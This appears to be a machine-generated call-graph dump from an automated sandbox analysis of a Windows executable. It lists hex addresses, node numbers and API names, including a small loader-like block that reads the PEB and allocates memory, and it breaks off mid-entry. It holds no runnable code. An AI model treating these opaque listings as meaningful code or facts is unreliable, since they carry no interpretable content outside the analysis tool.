80 API calls 87959->87961 87960->87929 87961->87960 87962->87926 87964 76bd7a 87963->87964 87965 76bd69 87963->87965 87964->87956 87967 742aae 87965->87967 87968 742aba __getstream 87967->87968 87969 742ad4 87968->87969 87970 742aec 87968->87970 87972 742ae4 __getstream 87968->87972 87971 747c0e __setmbcp 47 API calls 87969->87971 87973 744e1c __lock_file 48 API calls 87970->87973 87974 742ad9 87971->87974 87972->87964 87975 742af2 87973->87975 87976 746e10 _fprintf 8 API calls 87974->87976 87977 742957 78 API calls 87975->87977 87976->87972 87978 742b06 87977->87978 87979 742b24 LeaveCriticalSection LeaveCriticalSection 87978->87979 87979->87972 87981 743587 87980->87981 87982 74359b 87980->87982 88032 747c0e 47 API calls __getptd_noexit 87981->88032 87983 743597 87982->87983 87999 742c84 87982->87999 87998 743653 LeaveCriticalSection LeaveCriticalSection _fseek 87983->87998 87985 74358c 88033 746e10 8 API calls _fprintf 87985->88033 87991 742933 __fputwc_nolock 47 API calls 87992 7435b5 87991->87992 88009 74e9d2 87992->88009 87994 7435bb 87994->87983 87995 741c9d _free 47 API calls 87994->87995 87995->87983 87996->87947 87997->87951 87998->87951 88000 742c97 87999->88000 88004 742cbb 87999->88004 88001 742933 __fputwc_nolock 47 API calls 88000->88001 88000->88004 88002 742cb4 88001->88002 88034 74af61 88002->88034 88005 74eb36 88004->88005 88006 7435af 88005->88006 88007 74eb43 88005->88007 88006->87991 88007->88006 88008 741c9d _free 47 API calls 88007->88008 88008->88006 88010 74e9de __getstream 88009->88010 88011 74e9e6 88010->88011 88012 74e9fe 88010->88012 88083 747bda 47 API calls __getptd_noexit 88011->88083 88013 74ea7b 88012->88013 88018 74ea28 88012->88018 88087 747bda 47 API calls __getptd_noexit 88013->88087 88016 74e9eb 88084 747c0e 47 API calls __getptd_noexit 88016->88084 88017 74ea80 88088 747c0e 47 API calls __getptd_noexit 88017->88088 88059 74a8ed 88018->88059 88020 74e9f3 __getstream 88020->87994 88023 74ea88 88089 746e10 8 API calls _fprintf 88023->88089 88024 74ea2e 88026 74ea41 88024->88026 88027 74ea4c 88024->88027 88068 74ea9c 88026->88068 88085 747c0e 47 API calls __getptd_noexit 88027->88085 88030 74ea47 88086 74ea73 LeaveCriticalSection __unlock_fhandle 88030->88086 88032->87985 88033->87983 88035 74af6d __getstream 88034->88035 88036 74af75 88035->88036 88037 74af8d 88035->88037 88039 747bda __lseeki64 47 API calls 88036->88039 88038 74b022 88037->88038 88043 74afbf 88037->88043 88040 747bda __lseeki64 47 API calls 88038->88040 88041 74af7a 88039->88041 88044 74b027 88040->88044 88042 747c0e __setmbcp 47 API calls 88041->88042 88045 74af82 __getstream 88042->88045 88046 74a8ed ___lock_fhandle 49 API calls 88043->88046 88047 747c0e __setmbcp 47 API calls 88044->88047 88045->88004 88048 74afc5 88046->88048 88049 74b02f 88047->88049 88050 74afd8 88048->88050 88051 74afeb 88048->88051 88052 746e10 _fprintf 8 API calls 88049->88052 88053 74b043 __chsize_nolock 75 API calls 88050->88053 88054 747c0e __setmbcp 47 API calls 88051->88054 88052->88045 88056 74afe4 88053->88056 88055 74aff0 88054->88055 88057 747bda __lseeki64 47 API calls 88055->88057 88058 74b01a __flush LeaveCriticalSection 88056->88058 88057->88056 88058->88045 88060 74a8f9 __getstream 88059->88060 88061 74a946 EnterCriticalSection 88060->88061 88063 747cf4 __lock 47 API calls 88060->88063 88062 74a96c __getstream 88061->88062 88062->88024 88064 74a91d 88063->88064 88065 74a928 InitializeCriticalSectionAndSpinCount 88064->88065 88066 74a93a 88064->88066 88065->88066 88067 74a970 ___lock_fhandle LeaveCriticalSection 88066->88067 88067->88061 88069 74aba4 __lseeki64_nolock 47 API calls 88068->88069 88072 74eaaa 88069->88072 88070 74eb00 88071 74ab1e __free_osfhnd 48 API calls 88070->88071 88073 74eb08 88071->88073 88072->88070 88074 74aba4 __lseeki64_nolock 47 API calls 88072->88074 88082 74eade 88072->88082 88078 747bed __dosmaperr 47 API calls 88073->88078 88079 74eb2a 88073->88079 88076 74ead5 88074->88076 88075 74aba4 __lseeki64_nolock 47 API calls 88077 74eaea CloseHandle 88075->88077 88080 74aba4 __lseeki64_nolock 47 API calls 88076->88080 88077->88070 88081 74eaf6 GetLastError 88077->88081 88078->88079 88079->88030 88080->88082 88081->88070 88082->88070 88082->88075 88083->88016 88084->88020 88085->88030 88086->88020 88087->88017 88088->88023 88089->88020 88090->87435 88091->87435 88092->87436 88093->87449 88094->87451 88095->87447 88096->87465 88097->87460 88099 74f8a0 __ftell_nolock 88098->88099 88100 7240b4 GetLongPathNameW 88099->88100 88101 726a63 48 API calls 88100->88101 88102 7240dc 88101->88102 88103 7249a0 88102->88103 88104 72d7f7 48 API calls 88103->88104 88105 7249b2 88104->88105 88106 72660f 49 API calls 88105->88106 88107 7249bd 88106->88107 88108 7249c8 88107->88108 88109 792e35 88107->88109 88110 7264cf 48 API calls 88108->88110 88113 792e4f 88109->88113 88156 73d35e 60 API calls 88109->88156 88112 7249d4 88110->88112 88150 7228a6 88112->88150 88115 7249e7 Mailbox 88115->87294 88117 7241a9 136 API calls 88116->88117 88118 72415e 88117->88118 88119 793489 88118->88119 88120 7241a9 136 API calls 88118->88120 88121 76c396 122 API calls 88119->88121 88122 724172 88120->88122 88123 79349e 88121->88123 88122->88119 88124 72417a 88122->88124 88125 7934bf 88123->88125 88126 7934a2 88123->88126 88128 7934aa 88124->88128 88129 724186 88124->88129 88127 73f4ea 48 API calls 88125->88127 88130 724252 84 API calls 88126->88130 88149 793504 Mailbox 88127->88149 88244 766b49 88 API calls _wprintf 88128->88244 88157 72c833 88129->88157 88130->88128 88134 7934b8 88134->88125 88135 7936b4 88136 741c9d _free 47 API calls 88135->88136 88137 7936bc 88136->88137 88138 724252 84 API calls 88137->88138 88143 7936c5 88138->88143 88142 741c9d _free 47 API calls 88142->88143 88143->88142 88144 724252 84 API calls 88143->88144 88250 7625b5 87 API calls 4 library calls 88143->88250 88144->88143 88146 72ce19 48 API calls 88146->88149 88149->88135 88149->88143 88149->88146 88245 762551 48 API calls _memcpy_s 88149->88245 88246 762472 60 API calls 2 library calls 88149->88246 88247 769c12 48 API calls 88149->88247 88248 72ba85 48 API calls _memcpy_s 88149->88248 88249 724dd9 48 API calls 88149->88249 88151 7228d7 _memcpy_s 88150->88151 88152 7228b8 88150->88152 88153 73f4ea 48 API calls 88151->88153 88154 73f4ea 48 API calls 88152->88154 88155 7228ee 88153->88155 88154->88151 88155->88115 88156->88109 88158 72c843 __ftell_nolock 88157->88158 88159 72c860 88158->88159 88160 793095 88158->88160 88256 7248ba 49 API calls 88159->88256 88275 7625b5 87 API calls 4 library calls 88160->88275 88163 7930a8 88276 7625b5 87 API calls 4 library calls 88163->88276 88164 72c882 88257 724550 56 API calls 88164->88257 88166 72c897 88166->88163 88168 72c89f 88166->88168 88170 72d7f7 48 API calls 88168->88170 88169 7930c4 88172 72c90c 88169->88172 88171 72c8ab 88170->88171 88258 73e968 49 API calls __ftell_nolock 88171->88258 88175 72c91a 88172->88175 88176 7930d7 88172->88176 88174 72c8b7 88177 72d7f7 48 API calls 88174->88177 88261 741dfc 88175->88261 88179 724907 CloseHandle 88176->88179 88180 72c8c3 88177->88180 88181 7930e3 88179->88181 88182 72660f 49 API calls 88180->88182 88183 7241a9 136 API calls 88181->88183 88185 72c8d1 88182->88185 88184 79310d 88183->88184 88186 793136 88184->88186 88189 76c396 122 API calls 88184->88189 88259 73eb66 SetFilePointerEx ReadFile 88185->88259 88277 7625b5 87 API calls 4 library calls 88186->88277 88188 72c943 _wcscat _wcscpy 88192 72c96d SetCurrentDirectoryW 88188->88192 88194 793129 88189->88194 88190 72c8fd 88260 7246ce SetFilePointerEx SetFilePointerEx 88190->88260 88193 73f4ea 48 API calls 88192->88193 88196 72c988 88193->88196 88197 793131 88194->88197 88198 793152 88194->88198 88199 7247b7 48 API calls 88196->88199 88200 724252 84 API calls 88197->88200 88201 724252 84 API calls 88198->88201 88230 72c993 Mailbox __wsetenvp 88199->88230 88200->88186 88202 793157 88201->88202 88203 73f4ea 48 API calls 88202->88203 88210 793194 88203->88210 88204 72ca9d 88271 724907 88204->88271 88208 72caa9 SetCurrentDirectoryW 88231 72cad1 Mailbox 88208->88231 88209 723d98 88209->87160 88209->87169 88278 72ba85 48 API calls _memcpy_s 88210->88278 88214 7933ce 88284 769b72 48 API calls 88214->88284 88215 793467 88288 7625b5 87 API calls 4 library calls 88215->88288 88218 793480 88218->88204 88220 7933f0 88285 7829e8 48 API calls _memcpy_s 88220->88285 88222 7933fd 88225 741c9d _free 47 API calls 88222->88225 88224 79345f 88287 76240b 48 API calls 3 library calls 88224->88287 88225->88231 88226 72ce19 48 API calls 88226->88230 88230->88204 88230->88215 88230->88224 88230->88226 88264 72b337 56 API calls _wcscpy 88230->88264 88265 73c258 GetStringTypeW 88230->88265 88266 72cb93 59 API calls __wcsnicmp 88230->88266 88267 72cb5a GetStringTypeW __wsetenvp 88230->88267 88268 7416d0 GetStringTypeW wcstoxq 88230->88268 88269 72cc24 163 API calls 3 library calls 88230->88269 88270 73c682 48 API calls 88230->88270 88251 7248dd 88231->88251 88235 72ce19 48 API calls 88241 7931dd Mailbox 88235->88241 88238 793420 88286 7625b5 87 API calls 4 library calls 88238->88286 88240 793439 88242 741c9d _free 47 API calls 88240->88242 88241->88214 88241->88235 88241->88238 88279 762551 48 API calls _memcpy_s 88241->88279 88280 762472 60 API calls 2 library calls 88241->88280 88281 769c12 48 API calls 88241->88281 88282 72ba85 48 API calls _memcpy_s 88241->88282 88283 73c682 48 API calls 88241->88283 88243 79314d 88242->88243 88243->88231 88244->88134 88245->88149 88246->88149 88247->88149 88248->88149 88249->88149 88250->88143 88252 724907 CloseHandle 88251->88252 88253 7248e5 Mailbox 88252->88253 88254 724907 CloseHandle 88253->88254 88255 7248fc 88254->88255 88255->88209 88256->88164 88257->88166 88258->88174 88259->88190 88260->88172 88289 741e46 88261->88289 88264->88230 88265->88230 88266->88230 88267->88230 88268->88230 88269->88230 88270->88230 88272 724920 88271->88272 88273 724911 88271->88273 88272->88273 88274 724925 CloseHandle 88272->88274 88273->88208 88274->88273 88275->88163 88276->88169 88277->88243 88278->88241 88279->88241 88280->88241 88281->88241 88282->88241 88283->88241 88284->88220 88285->88222 88286->88240 88287->88215 88288->88218 88290 741e61 88289->88290 88294 741e55 88289->88294 88313 747c0e 47 API calls __getptd_noexit 88290->88313 88292 742019 88297 741e41 88292->88297 88314 746e10 8 API calls _fprintf 88292->88314 88294->88290 88300 741ed4 88294->88300 88308 749d6b 47 API calls 2 library calls 88294->88308 88296 741fa0 88296->88290 88296->88297 88301 741fb0 88296->88301 88297->88188 88298 741f5f 88298->88290 88299 741f7b 88298->88299 88310 749d6b 47 API calls 2 library calls 88298->88310 88299->88290 88299->88297 88304 741f91 88299->88304 88300->88290 88307 741f41 88300->88307 88309 749d6b 47 API calls 2 library calls 88300->88309 88312 749d6b 47 API calls 2 library calls 88301->88312 88311 749d6b 47 API calls 2 library calls 88304->88311 88307->88296 88307->88298 88308->88300 88309->88307 88310->88299 88311->88297 88312->88297 88313->88292 88314->88297 88316 724d94 88315->88316 88317 724c8b 88315->88317 88316->87300 88317->88316 88318 73f4ea 48 API calls 88317->88318 88319 724cb2 88318->88319 88320 73f4ea 48 API calls 88319->88320 88324 724d22 88320->88324 88324->88316 88328 72b470 88324->88328 88356 724dd9 48 API calls 88324->88356 88357 769af1 48 API calls 88324->88357 88358 72ba85 48 API calls _memcpy_s 88324->88358 88326->87303 88327->87305 88359 726b0f 88328->88359 88330 72b69b 88366 72ba85 48 API calls _memcpy_s 88330->88366 88332 72b6b5 Mailbox 88332->88324 88335 793939 _memcpy_s 88369 7626bc 89 API calls 4 library calls 88335->88369 88336 72ba85 48 API calls 88349 72b495 88336->88349 88337 79397b 88370 7626bc 89 API calls 4 library calls 88337->88370 88338 72b9e4 88372 7626bc 89 API calls 4 library calls 88338->88372 88341 793973 88341->88332 88344 793989 88371 72ba85 48 API calls _memcpy_s 88344->88371 88345 72bcce 48 API calls 88345->88349 88347 793909 88348 726b4a 48 API calls 88347->88348 88353 793914 88348->88353 88349->88330 88349->88335 88349->88336 88349->88337 88349->88338 88349->88345 88349->88347 88350 72bb85 48 API calls 88349->88350 88352 72bdfa 48 API calls 88349->88352 88364 72c413 59 API calls 88349->88364 88365 72bc74 48 API calls 88349->88365 88367 72c6a5 49 API calls 88349->88367 88368 72c799 48 API calls _memcpy_s 88349->88368 88350->88349 88354 72b66c CharUpperBuffW 88352->88354 88355 73f4ea 48 API calls 88353->88355 88354->88349 88355->88335 88356->88324 88357->88324 88358->88324 88360 73f4ea 48 API calls 88359->88360 88361 726b34 88360->88361 88362 726b4a 48 API calls 88361->88362 88363 726b43 88362->88363 88363->88349 88364->88349 88365->88349 88366->88332 88367->88349 88368->88349 88369->88341 88370->88344 88371->88341 88372->88341 88374 79418d EnumResourceNamesW 88373->88374 88375 72403c LoadImageW 88373->88375 88376 723ee1 RegisterClassExW 88374->88376 88375->88376 88377 723f53 7 API calls 88376->88377 88377->87319 88379 724c44 88378->88379 88380 793c33 88378->88380 88379->87325 88404 765819 61 API calls _W_store_winword 88379->88404 88380->88379 88381 793c3c DestroyIcon 88380->88381 88381->88379 88383 7251cb 88382->88383 88403 7252a2 Mailbox 88382->88403 88403->87330 88404->87325 88406 72ef11 88405->88406 88407 72ef1d 88406->88407 88615 76cc5c 87 API calls 4 library calls 88406->88615 88407->87391 88409 7986f9 88409->88409 88411 72f130 88410->88411 88414 72fe30 332 API calls 88411->88414 88418 72f199 88411->88418 88412 72f3dd 88415 7987c8 88412->88415 88426 72f3f2 88412->88426 88460 72f431 Mailbox 88412->88460 88413 72f595 88420 72d7f7 48 API calls 88413->88420 88413->88460 88416 798728 88414->88416 88620 76cc5c 87 API calls 4 library calls 88415->88620 88416->88418 88617 76cc5c 87 API calls 4 library calls 88416->88617 88418->88412 88418->88413 88421 72d7f7 48 API calls 88418->88421 88456 72f229 88418->88456 88422 7987a3 88420->88422 88424 798772 88421->88424 88423 798b1b 88618 740f0a 52 API calls __cinit 88424->88618 88453 72f418 88426->88453 88429 72d6e9 55 API calls 88429->88460 88432 76cc5c 87 API calls 88432->88460 88434 798b7e 88435 798c53 88439 798beb 88441 72fe30 332 API calls 88441->88460 88450 731b90 48 API calls 88450->88460 88453->88423 88454 72f6aa 88453->88454 88453->88460 88455 72fce0 88454->88455 88454->88460 88474 72f537 Mailbox 88454->88474 88455->88474 88456->88412 88456->88413 88456->88453 88456->88460 88460->88429 88460->88432 88460->88434 88460->88435 88460->88439 88460->88441 88460->88450 88460->88455 88460->88474 88616 72dd47 48 API calls _memcpy_s 88460->88616 88628 7597ed InterlockedDecrement 88460->88628 88636 73c1af 48 API calls 88460->88636 88474->87391 88476 734637 88475->88476 88477 73479f 88475->88477 88478 734643 88476->88478 88479 796e05 88476->88479 88480 72ce19 48 API calls 88477->88480 88637 734300 88478->88637 88705 77e822 88479->88705 88487 7346e4 Mailbox 88480->88487 88488 724252 84 API calls 88487->88488 88652 766524 88487->88652 88655 76fa0c 88487->88655 88696 776ff0 88487->88696 88827 72bd30 88492->88827 88494 733267 88496 79907a 88494->88496 88497 7332f8 88494->88497 88556 733628 88494->88556 88565 73e253 88564->88565 88566 79df42 88564->88566 88565->87391 88567 79df77 88566->88567 88568 79df59 TranslateAcceleratorW 88566->88568 88568->88565 88570 73dca3 88569->88570 88573 73dc71 88569->88573 88570->87391 88571 73dc96 IsDialogMessageW 88571->88570 88571->88573 88572 79dd1d GetClassLongW 88572->88571 88572->88573 88573->88570 88573->88571 88573->88572 88574->87391 88575->87343 88576->87337 88577->87342 88578->87391 88579->87391 88580->87386 88581->87386 88582->87386 88584 72fe50 88583->88584 88592 72fe7e 88583->88592 88585 73f4ea 48 API calls 88584->88585 88585->88592 88586 73146e 88587 726eed 48 API calls 88586->88587 88597 72ffe1 88587->88597 88588 731473 88881 76cc5c 87 API calls 4 library calls 88588->88881 88589 72d7f7 48 API calls 88589->88592 88591 730509 88882 76cc5c 87 API calls 4 library calls 88591->88882 88592->88586 88592->88588 88592->88589 88592->88591 88595 73f4ea 48 API calls 88592->88595 88596 740f0a 52 API calls __cinit 88592->88596 88592->88597 88598 79a246 88592->88598 88602 726eed 48 API calls 88592->88602 88605 7597ed InterlockedDecrement 88592->88605 88606 79a30e 88592->88606 88608 79a973 88592->88608 88611 7315b5 88592->88611 88864 731d10 88592->88864 88878 731820 332 API calls 2 library calls 88592->88878 88595->88592 88596->88592 88597->87391 88600 726eed 48 API calls 88598->88600 88599 79a922 88599->87391 88600->88597 88602->88592 88604 79a873 88604->87391 88605->88592 88606->88597 88879 7597ed InterlockedDecrement 88606->88879 88883 76cc5c 87 API calls 4 library calls 88608->88883 88610 79a982 88880 76cc5c 87 API calls 4 library calls 88611->88880 88612->87386 88613->87386 88614->87386 88615->88409 88616->88460 88617->88418 88618->88456 88620->88474 88628->88460 88636->88460 88638 796e60 88637->88638 88641 73432c 88637->88641 88640 796e71 88641->88640 88648 734366 _memcpy_s 88641->88648 88750 766ca9 GetFileAttributesW 88652->88750 88656 76fa1c __ftell_nolock 88655->88656 88706 77e84e 88705->88706 88707 77e868 88705->88707 88819 76cc5c 87 API calls 4 library calls 88706->88819 88820 77ccdc 48 API calls 88707->88820 88828 72bd3f 88827->88828 88831 72bd5a 88827->88831 88829 72bdfa 48 API calls 88828->88829 88830 72bd47 CharUpperBuffW 88829->88830 88830->88831 88831->88494 88865 731d2a 88864->88865 88869 731ed6 88864->88869 88866 732357 88865->88866 88865->88869 88870 731e0b 88865->88870 88871 731eba 88865->88871 88866->88871 88887 769f44 58 API calls wcstoxq 88866->88887 88867 731f55 88867->88871 88876 731e9a Mailbox 88867->88876 88885 7597ed InterlockedDecrement 88867->88885 88869->88866 88869->88867 88869->88871 88869->88876 88870->88867 88870->88871 88872 731e47 88870->88872 88871->88592 88872->88871 88872->88876 88876->88871 88878->88592 88879->88597 88880->88597 88881->88604 88882->88599 88883->88610 88885->88876 88887->88871 88888 723742 88889 72374b 88888->88889 88890 7237c8 88889->88890 88891 723769 88889->88891 88928 7237c6 88889->88928 88895 791e00 88890->88895 88896 7237ce 88890->88896 88892 723776 88891->88892 88893 72382c PostQuitMessage 88891->88893 88898 791e88 88892->88898 88899 723781 88892->88899 88920 7237b9 88893->88920 88894 7237ab DefWindowProcW 88894->88920 88943 722ff6 16 API calls 88895->88943 88900 7237d3 88896->88900 88901 7237f6 SetTimer RegisterWindowMessageW 88896->88901 88948 764ddd 60 API calls _memset 88898->88948 88903 723836 88899->88903 88904 723789 88899->88904 88907 7237da KillTimer 88900->88907 88908 791da3 88900->88908 88905 72381f CreatePopupMenu 88901->88905 88901->88920 88902 791e27 88944 73e312 332 API calls Mailbox 88902->88944 88933 73eb83 88903->88933 88911 791e6d 88904->88911 88912 723794 88904->88912 88905->88920 88940 723847 Shell_NotifyIconW _memset 88907->88940 88915 791da8 88908->88915 88916 791ddc MoveWindow 88908->88916 88911->88894 88947 75a5f3 48 API calls 88911->88947 88918 72379f 88912->88918 88919 791e58 88912->88919 88913 791e9a 88913->88894 88913->88920 88921 791dcb SetFocus 88915->88921 88922 791dac 88915->88922 88916->88920 88917 7237ed 88941 72390f DeleteObject DestroyWindow Mailbox 88917->88941 88918->88894 88945 723847 Shell_NotifyIconW _memset 88918->88945 88946 7655bd 70 API calls _memset 88919->88946 88921->88920 88922->88918 88925 791db5 88922->88925 88942 722ff6 16 API calls 88925->88942 88927 791e68 88927->88920 88928->88894 88931 791e4c 88932 724ffc 67 API calls 88931->88932 88932->88928 88934 73eb9a _memset 88933->88934 88935 73ec1c 88933->88935 88936 7251af 50 API calls 88934->88936 88935->88920 88938 73ebc1 88936->88938 88937 73ec05 KillTimer SetTimer 88937->88935 88938->88937 88939 793c7a Shell_NotifyIconW 88938->88939 88939->88937 88940->88917 88941->88920 88942->88920 88943->88902 88944->88918 88945->88931 88946->88927 88947->88928 88948->88913 88949 7919cb 88954 722322 88949->88954 88951 7919d1 88987 740f0a 52 API calls __cinit 88951->88987 88953 7919db 88955 722344 88954->88955 88988 7226df 88955->88988 88960 72d7f7 48 API calls 88961 722384 88960->88961 88962 72d7f7 48 API calls 88961->88962 88963 72238e 88962->88963 88964 72d7f7 48 API calls 88963->88964 88965 722398 88964->88965 88966 72d7f7 48 API calls 88965->88966 88967 7223de 88966->88967 88968 72d7f7 48 API calls 88967->88968 88969 7224c1 88968->88969 88996 72263f 88969->88996 88973 7224f1 88974 72d7f7 48 API calls 88973->88974 88975 7224fb 88974->88975 89025 722745 88975->89025 88977 722546 88978 722556 GetStdHandle 88977->88978 88979 7225b1 88978->88979 88980 79501d 88978->88980 88982 7225b7 CoInitialize 88979->88982 88980->88979 88981 795026 88980->88981 89032 7692d4 53 API calls 88981->89032 88982->88951 88984 79502d 89033 7699f9 CreateThread 88984->89033 88986 795039 CloseHandle 88986->88982 88987->88953 89034 722854 88988->89034 88991 726a63 48 API calls 88992 72234a 88991->88992 88993 72272e 88992->88993 89048 7227ec 6 API calls 88993->89048 88995 72237a 88995->88960 88997 72d7f7 48 API calls 88996->88997 88998 72264f 88997->88998 88999 72d7f7 48 API calls 88998->88999 89000 722657 88999->89000 89049 7226a7 89000->89049 89003 7226a7 48 API calls 89004 722667 89003->89004 89005 72d7f7 48 API calls 89004->89005 89006 722672 89005->89006 89007 73f4ea 48 API calls 89006->89007 89008 7224cb 89007->89008 89009 7222a4 89008->89009 89010 7222b2 89009->89010 89011 72d7f7 48 API calls 89010->89011 89012 7222bd 89011->89012 89013 72d7f7 48 API calls 89012->89013 89014 7222c8 89013->89014 89015 72d7f7 48 API calls 89014->89015 89016 7222d3 89015->89016 89017 72d7f7 48 API calls 89016->89017 89018 7222de 89017->89018 89019 7226a7 48 API calls 89018->89019 89020 7222e9 89019->89020 89021 73f4ea 48 API calls 89020->89021 89022 7222f0 89021->89022 89023 7222f9 RegisterWindowMessageW 89022->89023 89024 791fe7 89022->89024 89023->88973 89026 795f4d 89025->89026 89027 722755 89025->89027 89054 76c942 50 API calls 89026->89054 89029 73f4ea 48 API calls 89027->89029 89031 72275d 89029->89031 89030 795f58 89031->88977 89032->88984 89033->88986 89055 7699df 54 API calls 89033->89055 89041 722870 89034->89041 89037 722870 48 API calls 89038 722864 89037->89038 89039 72d7f7 48 API calls 89038->89039 89040 722716 89039->89040 89040->88991 89042 72d7f7 48 API calls 89041->89042 89043 72287b 89042->89043 89044 72d7f7 48 API calls 89043->89044 89045 722883 89044->89045 89046 72d7f7 48 API calls 89045->89046 89047 72285c 89046->89047 89047->89037 89048->88995 89050 72d7f7 48 API calls 89049->89050 89051 7226b0 89050->89051 89052 72d7f7 48 API calls 89051->89052 89053 72265f 89052->89053 89053->89003 89054->89030 89056 f066a3 89057 f066aa 89056->89057 89058 f066b2 89057->89058 89059 f06748 89057->89059 89063 f06358 89058->89063 89076 f06ff8 9 API calls 89059->89076 89062 f0672f 89064 f03d48 GetPEB 89063->89064 89067 f063f7 89064->89067 89066 f06428 CreateFileW 89066->89067 89070 f06435 89066->89070 89068 f06451 VirtualAlloc 89067->89068 89067->89070 89074 f06558 CloseHandle 89067->89074 89075 f06568 VirtualFree 89067->89075 89077 f07268 GetPEB 89067->89077 89069 f06472 ReadFile 89068->89069 89068->89070 89069->89070 89071 f06490 VirtualAlloc 89069->89071 89072 f06652 89070->89072 89073 f06644 VirtualFree 89070->89073 89071->89067 89071->89070 89072->89062 89073->89072 89074->89067 89075->89067 89076->89062 89078 f07292 89077->89078 89078->89066 89079 799bec 89114 730ae0 _memcpy_s Mailbox 89079->89114 89083 73f4ea 48 API calls 89109 72fec8 89083->89109 89084 730509 89177 76cc5c 87 API calls 4 library calls 89084->89177 89085 73146e 89093 726eed 48 API calls 89085->89093 89086 731d10 59 API calls 89086->89109 89089 731473 89176 76cc5c 87 API calls 4 library calls 89089->89176 89090 726eed 48 API calls 89090->89109 89091 79a246 89096 726eed 48 API calls 89091->89096 89092 79a922 89108 72ffe1 Mailbox 89093->89108 89096->89108 89098 79a873 89099 72d7f7 48 API calls 89099->89109 89100 79a30e 89100->89108 89172 7597ed InterlockedDecrement 89100->89172 89101 740f0a 52 API calls __cinit 89101->89109 89102 72ce19 48 API calls 89102->89114 89103 7597ed InterlockedDecrement 89103->89109 89105 79a973 89178 76cc5c 87 API calls 4 library calls 89105->89178 89107 79a982 89109->89083 89109->89084 89109->89085 89109->89086 89109->89089 89109->89090 89109->89091 89109->89099 89109->89100 89109->89101 89109->89103 89109->89105 89109->89108 89110 7315b5 89109->89110 89170 731820 332 API calls 2 library calls 89109->89170 89175 76cc5c 87 API calls 4 library calls 89110->89175 89111 77e822 332 API calls 89111->89114 89112 73f4ea 48 API calls 89112->89114 89113 72fe30 332 API calls 89113->89114 89114->89102 89114->89108 89114->89109 89114->89111 89114->89112 89114->89113 89115 79a706 89114->89115 89117 731526 Mailbox 89114->89117 89118 7597ed InterlockedDecrement 89114->89118 89122 780d09 89114->89122 89125 76b55b 89114->89125 89129 780d1d 89114->89129 89132 77f0ac 89114->89132 89164 76a6ef 89114->89164 89171 77ef61 83 API calls 2 library calls 89114->89171 89173 76cc5c 87 API calls 4 library calls 89115->89173 89174 76cc5c 87 API calls 4 library calls 89117->89174 89118->89114 89179 77f8ae 89122->89179 89124 780d19 89124->89114 89126 76b564 89125->89126 89127 76b569 89125->89127 89265 76a4d5 89126->89265 89127->89114 89130 77f8ae 130 API calls 89129->89130 89131 780d2d 89130->89131 89131->89114 89133 72d7f7 48 API calls 89132->89133 89134 77f0c0 89133->89134 89135 72d7f7 48 API calls 89134->89135 89136 77f0c8 89135->89136 89137 72d7f7 48 API calls 89136->89137 89138 77f0d0 89137->89138 89139 72936c 82 API calls 89138->89139 89149 77f0de 89139->89149 89140 726a63 48 API calls 89140->89149 89141 72c799 48 API calls 89141->89149 89142 77f2f9 Mailbox 89142->89114 89144 77f2b3 89147 72518c 48 API calls 89144->89147 89145 77f2ce 89148 72518c 48 API calls 89145->89148 89146 726eed 48 API calls 89146->89149 89150 77f2c0 89147->89150 89151 77f2dd 89148->89151 89149->89140 89149->89141 89149->89142 89149->89144 89149->89145 89149->89146 89152 72bdfa 48 API calls 89149->89152 89155 72bdfa 48 API calls 89149->89155 89157 77f2cc 89149->89157 89161 72518c 48 API calls 89149->89161 89162 72936c 82 API calls 89149->89162 89163 72510d 48 API calls 89149->89163 89153 72510d 48 API calls 89150->89153 89154 72510d 48 API calls 89151->89154 89156 77f175 CharUpperBuffW 89152->89156 89153->89157 89154->89157 89158 77f23a CharUpperBuffW 89155->89158 89159 72d645 53 API calls 89156->89159 89157->89142 89288 726b68 48 API calls 89157->89288 89287 73d922 55 API calls 2 library calls 89158->89287 89159->89149 89161->89149 89162->89149 89163->89149 89165 76a6fb 89164->89165 89166 73f4ea 48 API calls 89165->89166 89167 76a709 89166->89167 89168 76a717 89167->89168 89169 72d7f7 48 API calls 89167->89169 89168->89114 89169->89168 89170->89109 89171->89114 89172->89108 89173->89117 89174->89108 89175->89108 89176->89098 89177->89092 89178->89107 89180 72936c 82 API calls 89179->89180 89181 77f8ea 89180->89181 89186 77f92c Mailbox 89181->89186 89215 780567 89181->89215 89183 77fb8b 89184 77fcfa 89183->89184 89189 77fb95 89183->89189 89251 780688 90 API calls Mailbox 89184->89251 89186->89124 89188 77fd07 89188->89189 89190 77fd13 89188->89190 89228 77f70a 89189->89228 89190->89186 89191 72936c 82 API calls 89208 77f984 Mailbox 89191->89208 89196 77fbc9 89242 73ed18 89196->89242 89199 77fbe3 89248 76cc5c 87 API calls 4 library calls 89199->89248 89200 77fbfd 89202 73c050 48 API calls 89200->89202 89204 77fc14 89202->89204 89203 77fbee GetCurrentProcess TerminateProcess 89203->89200 89205 731b90 48 API calls 89204->89205 89214 77fc3e 89204->89214 89207 77fc2d 89205->89207 89206 77fd65 89206->89186 89211 77fd7e FreeLibrary 89206->89211 89249 78040f 106 API calls _free 89207->89249 89208->89183 89208->89186 89208->89191 89208->89208 89246 7829e8 48 API calls _memcpy_s 89208->89246 89247 77fda5 60 API calls 2 library calls 89208->89247 89210 731b90 48 API calls 89210->89214 89211->89186 89214->89206 89214->89210 89250 72dcae 50 API calls Mailbox 89214->89250 89252 78040f 106 API calls _free 89214->89252 89216 72bdfa 48 API calls 89215->89216 89217 780582 CharLowerBuffW 89216->89217 89253 761f11 89217->89253 89221 72d7f7 48 API calls 89222 7805bb 89221->89222 89260 7269e9 48 API calls _memcpy_s 89222->89260 89224 7805d2 89225 72b18b 48 API calls 89224->89225 89226 7805de Mailbox 89225->89226 89227 78061a Mailbox 89226->89227 89261 77fda5 60 API calls 2 library calls 89226->89261 89227->89208 89229 77f725 89228->89229 89233 77f77a 89228->89233 89230 73f4ea 48 API calls 89229->89230 89231 77f747 89230->89231 89232 73f4ea 48 API calls 89231->89232 89231->89233 89232->89231 89234 780828 89233->89234 89235 780a53 Mailbox 89234->89235 89241 78084b _strcat _wcscpy __wsetenvp 89234->89241 89235->89196 89236 72cf93 58 API calls 89236->89241 89237 72d286 48 API calls 89237->89241 89238 72936c 82 API calls 89238->89241 89239 74395c 47 API calls __crtLCMapStringA_stat 89239->89241 89241->89235 89241->89236 89241->89237 89241->89238 89241->89239 89264 768035 50 API calls __wsetenvp 89241->89264 89245 73ed2d 89242->89245 89243 73edc5 VirtualProtect 89244 73ed93 89243->89244 89244->89199 89244->89200 89245->89243 89245->89244 89246->89208 89247->89208 89248->89203 89249->89214 89250->89214 89251->89188 89252->89214 89255 761f3b __wsetenvp 89253->89255 89254 761f79 89254->89221 89254->89226 89255->89254 89257 761f6f 89255->89257 89258 